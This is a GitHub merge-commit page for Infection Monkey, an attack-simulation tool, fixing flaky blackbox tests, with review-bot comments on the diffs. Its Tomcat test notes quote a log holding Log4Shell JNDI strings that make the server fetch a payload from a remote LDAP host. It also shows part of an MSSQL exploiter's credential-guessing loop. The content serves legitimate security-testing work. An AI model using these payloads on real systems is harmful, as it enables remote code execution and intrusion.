Merge pull request #1927 from guardicore/1921-fix-flaky-bb-tests

1921 fix flaky bb tests
Mike Salvatore 2022-05-04 13:28:04 -04:00 committed by GitHub
commit d5f93d21b7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 39 additions and 4 deletions


@ -915,7 +915,40 @@ Accessiable only through <strong>3-45 Powershell</strong> using credentials reus
</tr> </tr>
<tr class="even"> <tr class="even">
<td>Notes:</td> <td>Notes:</td>
<td></td> <td>The jvm's `java.security.egd` variable should be set to `/dev/urandom`,
otherwise the tomcat service can take a very long time to start. Set this by
editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
for more details.
Tomcat sessions that carry over through a reset can cause significant delays
when the tomcat server starts. When the server starts, it attempts to download
the log4shell payload, but the server is no longer listening. This operation
appears to have a 2 minute timeout. You can see it by viewing
`/usr/tomcat/logs/localhost.log`:
```
2022-04-28 16:15:45,541 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Sending application start events
2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- ContextListener: contextInitialized()
2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- SessionListener: contextInitialized()
2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session E5B004FF35E1CBB44FA8A69AB024941D
2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:29573/dn=Exploit}'
2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session 0677AD75F804B1FD4E24AF7F3BFA9DD9
2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:39466/dn=Exploit}'
2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filters
2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Set Character Encoding'
2022-04-28 16:20:07,477 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Compression Filter'
```
Notice the 2-minute gap between the timestamps after "loading attribute 'foo'".
To resolve this, modify /usr/tomcat/conf/context.xml and uncomment the following
setting:
```
<Manager pathname="" />
```
</td>
</tr> </tr>
</tbody> </tbody>
</table> </table>


@ -11,7 +11,7 @@ from .i_credentials_store import ICredentialsStore
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
CREDENTIALS_POLL_PERIOD_SEC = 30 CREDENTIALS_POLL_PERIOD_SEC = 10
class AggregatingCredentialsStore(ICredentialsStore): class AggregatingCredentialsStore(ICredentialsStore):
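Review bot: `CREDENTIALS_POLL_PERIOD_SEC` drops from 30 to 10 with no comment recording why that value was chosen or what it trades off. Judging from the pull-request title, the shorter period is meant to make the blackbox tests less timing-sensitive, but it presumably also triples how often the store polls for credentials. A comment beside the constant would keep that reasoning with the code, for example `# Seconds between credential refreshes; shortened to keep blackbox tests from racing the poll (#1921)`. The code that reads the constant is outside this hunk, so the wording should be checked against it.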


@ -242,7 +242,8 @@ class MSSQLExploiter(HostExploiter):
self.report_login_attempt(True, user, password) self.report_login_attempt(True, user, password)
cursor = conn.cursor() cursor = conn.cursor()
return cursor return cursor
except pymssql.OperationalError: except pymssql.OperationalError as err:
logger.info(f"Connection to MSSQL failed: {err}")
self.report_login_attempt(False, user, password) self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one # Combo didn't work, hopping to the next one
pass pass
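Review bot: The `except pymssql.OperationalError as err:` branch still calls `self.report_login_attempt(False, user, password)` for every `OperationalError`, and pymssql appears to raise that class for connection-level failures as well as rejected logins, so a server that is down or slow to answer would be recorded as a run of failed logins. The new log line makes the cause readable in the agent log, but the reported result is unchanged; it is worth confirming whether the report should distinguish the two cases. The trailing `pass` is dead code and can be removed, and the comment above it would read better placed before the `report_login_attempt` call. The enclosing method starts and ends outside this hunk.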


@ -116,7 +116,8 @@ class InfectionMonkey:
logger.info("Another instance of the monkey is already running") logger.info("Another instance of the monkey is already running")
return return
logger.info("Monkey is starting...") logger.info("Agent is starting...")
logger.info(f"Agent GUID: {GUID}")
self._add_default_server_to_config(self._opts.server) self._add_default_server_to_config(self._opts.server)
self._connect_to_island() self._connect_to_island()